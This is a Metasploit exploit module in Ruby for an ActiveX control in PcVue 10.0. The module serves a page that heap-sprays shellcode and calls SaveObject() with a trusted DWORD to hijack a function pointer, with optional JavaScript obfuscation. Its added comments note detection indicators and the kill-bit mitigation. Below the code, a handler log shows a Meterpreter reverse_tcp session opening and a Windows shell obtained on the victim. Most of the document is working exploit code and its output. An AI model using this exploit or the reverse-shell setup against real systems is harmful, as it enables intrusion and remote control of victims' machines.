
PcVue <= 10.0 SV.UIGrdCtrl.1 SaveObject() Trusted DWORD vulnerability
##
# $Id: pcvue_func.rb 14034 2011-10-23 11:56:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Browser exploit module for the PcVue 10.0 SV.UIGrdCtrl.1 ActiveX control
# (SVUIGrd.ocx). The served page instantiates the control by CLSID, heap-sprays
# the encoded payload, then calls SaveObject() with a DWORD that the control
# treats as trusted (see 'Description' below).
#
# Defender notes grounded in this file:
#   - The CLSID in the <object> tag built by on_request_uri identifies the
#     control; a page that instantiates it followed by a large string-doubling
#     loop is the stable, observable artifact of this module even when
#     OBFUSCATE is on and the variable names are randomized.
#   - Only clients whose User-Agent advertises MSIE 6.0 / 7.0 receive the
#     page; any other client is answered by the not-found handler, so a
#     scanner with a different User-Agent will not see the exploit content.
#   - Setting the ActiveX kill bit for that CLSID is the conventional
#     mitigation for a vulnerable control where no vendor fix is in place.
class Metasploit3 < Msf::Exploit::Remote
        Rank = AverageRanking

        include Msf::Exploit::Remote::HttpServer::HTML

        # Module metadata and options. Target 0 expects the sprayed heap to
        # cover 0x0a0a0a0a, which is also the value handed to SaveObject().
        # NOTE(review): target['Offset'] (1000) is not read anywhere in this
        # file, nor is the FILENAME option; both appear to be unused here.
        def initialize(info = {})
                super(update_info(info,
                        'Name'           => "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",
                        'Description'    => %q{
                                This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.
                                By setting a dword value for the SaveObject() or LoadObject(), an attacker can
                                overwrite a function pointer and execute arbitrary code.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'Luigi Auriemma', # original find
                                        'mr_me <steventhomasseeley[at]gmail-com>',       # msf module
                                        'TecR0c <roccogiovannicalvi[at]gmail-com >',# msf module
                                ],
                        'Version'        => '$Revision: 14034 $',
                        'References'     =>
                                [
                                        [ 'BID', '49795'],
                                        [ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                        'InitialAutoRunScript' => 'migrate -f'
                                },
                        # NUL, LF and CR are excluded because the payload travels
                        # inside a JavaScript string built with unescape().
                        'Payload'        =>
                                {
                                        'Space'           => 1024,
                                        'BadChars'        => "\x00\x0a\x0d",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [
                                                # IE 6/7 on Windows XP and Vista
                                                'Internet Explorer 6 / Internet Explorer 7',
                                                {
                                                        'Ret'    => 0x0a0a0a0a, # spray address and the DWORD passed to SaveObject()
                                                        'Offset' => 1000        # not referenced by on_request_uri
                                                }
                                        ]
                                ],
                        'DisclosureDate' => 'Oct 5 2011',
                        'DefaultTarget'  => 0))

                        # OBFUSCATE routes the generated script through JSObfu
                        # before it is embedded in the page (see on_request_uri).
                        register_options(
                                [
                                        OptString.new('FILENAME', [ false, 'The file name.',  'msf.html']),
                                        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]),
                                ], self.class)
        end

        # Serves the exploit page for one HTTP request.
        #
        # cli     - the client connection; used for peerhost/peerport in the
        #           status line and as the destination of send_response /
        #           send_not_found
        # request - the parsed HTTP request; only its User-Agent header is read
        #
        # Flow: gate on User-Agent -> encode payload -> build the JavaScript
        # spray -> optionally obfuscate -> wrap in HTML with the <object> tag
        # -> send as text/html.
        def on_request_uri(cli, request)

                # Only MSIE 6.0 / 7.0 user agents get the page; everything else
                # is handed to the not-found handler and logged as unsupported.
                # NOTE(review): [6|7] is a character class containing '6', '|'
                # and '7', so a literal "MSIE |.0" would also pass; [67] was
                # presumably intended.
                agent = request.headers['User-Agent']
                if agent !~ /MSIE [6|7]\.0/
                        print_error("Target not supported: #{agent.to_s}")
                        send_not_found(cli)
                        return
                end

                # Encode the payload in the %u form that JavaScript's unescape()
                # decodes, honouring the target's byte order.
                shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

                # Setup exploit buffers.
                # Despite the name, `nops` is the packed target.ret repeated by
                # the script below, so every slot of the sprayed region decodes
                # to the same address; `ret` is that address as a JS literal.
                nops      = Rex::Text.to_unescape([target.ret].pack('V'))
                ret       = "0x%08x" % target.ret

                # Each sprayed block is grown to ~blocksize bytes and fillto
                # copies are retained, so the spray is roughly fillto*blocksize
                # bytes of client memory (see the two while loops in the script).
                blocksize = 0x50000
                fillto    = 200

                # Randomize the javascript variable names. Every served page
                # therefore differs textually; only the structure (object tag,
                # doubling loops, array fill, SaveObject call) is constant.
                obj_name     = rand_text_alpha(rand(100) + 1)
                j_shellcode  = rand_text_alpha(rand(100) + 1)
                j_nops       = rand_text_alpha(rand(100) + 1)
                j_ret        = rand_text_alpha(rand(100) + 1)
                j_headersize = rand_text_alpha(rand(100) + 1)
                j_slackspace = rand_text_alpha(rand(100) + 1)
                j_fillblock  = rand_text_alpha(rand(100) + 1)
                j_block      = rand_text_alpha(rand(100) + 1)
                j_memory     = rand_text_alpha(rand(100) + 1)
                j_counter    = rand_text_alpha(rand(30) + 2)
                j_txt        = rand_text_alpha(rand(8) + 4)

                # Spray script: the filler is doubled until it covers
                # headersize + shellcode, a block is grown by concatenation up
                # to blocksize, and fillto copies of block+shellcode are kept
                # alive in an array. main() then calls the control's
                # SaveObject() with the DWORD in `ret` as its second argument.
                # NOTE(review): j_ret is generated above but never used in the
                # script; the literal `ret` is interpolated instead.
                js = <<-EOS
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape("#{nops}");
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while(#{j_nops}.length < #{j_slackspace}) {
  #{j_nops} += #{j_nops};
}
var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) {
  #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
}

#{j_memory} = new Array();
for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){
  #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ;
}

function main(){
  #{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0);
}
EOS

                # Strip two leading tabs from each heredoc line (a no-op when
                # the lines already start at column 0).
                js = js.gsub(/^\t\t/, '')

                # JS obfuscation on demand. JSObfu rewrites the whole script,
                # including the name of main(); sym('main') recovers the new
                # name so the call appended below still resolves.
                if datastore['OBFUSCATE']
                        js = ::Rex::Exploitation::JSObfu.new(js)
                        js.obfuscate
                        main_sym = js.sym('main')
                else
                        main_sym = "main"
                end

                # Page that instantiates the control by CLSID and runs the
                # script. The CLSID string is the most stable indicator of this
                # module in captured traffic, since nothing else in the page is
                # fixed across requests.
                content = <<-EOS
<html>
<body>
<object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
<script language='javascript'>
#{js}
#{main_sym}();
</script>
</body>
</html>
EOS

                # Remove the extra tabs from content (same treatment as the script).
                content = content.gsub(/^\t\t/, '')

                # Log the peer and deliver the page as text/html.
                print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}")
                send_response(cli, content, {'Content-Type'=>'text/html'})
        end
end
Example usage (handler side):
[mr_me@neptune pcvue]$ msfconsole -r handle.rc

 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 742 exploits - 378 auxiliary - 86 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r13848 updated today (2011.10.09)

resource (handle.rc)> use exploit/multi/handler
resource (handle.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (handle.rc)> set LHOST 192.168.114.1
LHOST => 192.168.114.1
resource (handle.rc)> set RHOST 192.168.114.142
RHOST => 192.168.114.142
resource (handle.rc)> set LPORT 4444
LPORT => 4444
resource (handle.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.114.1:4444
[*] Starting the payload handler...
msf  exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.114.142
[*] Meterpreter session 1 opened (192.168.114.1:4444 -> 192.168.114.142:1347) at 2011-10-10 15:15:07 +1100

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2720 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\steve\Desktop>